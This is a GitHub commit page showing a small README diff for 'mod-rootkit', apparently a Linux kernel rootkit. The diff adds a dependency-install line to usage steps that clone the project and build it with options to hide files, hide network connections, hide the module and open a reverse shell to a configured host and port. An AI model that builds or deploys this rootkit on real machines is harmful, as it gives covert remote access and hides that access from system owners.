Skip to content

Commit 3c911c4

Browse files
authored
Update README.md
1 parent ff0b6a5 commit 3c911c4

File tree

1 file changed

+2
-0
lines changed

1 file changed

+2
-0
lines changed

README.md

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -50,6 +50,8 @@ Tested on x86_64 Linux only
5050

5151
# Usage
5252
```bash
53+
sudo apt install -y build-essential linux-headers-$(uname -r) # install requirements
54+
5355
git clone https://github.com/flashnuke/mod-rootkit.git
5456
cd mod-rootkit
5557
make STRING_EXCLUDES="SOME_FILENAME1,SOME_FILENAME2" NET_EXCLUDES="127.0.0.1,2222" RSHELL_HOST=192.168.1.1 RSHELL_PORT=9001 HIDE_MODULE=0

0 commit comments

Comments
 (0)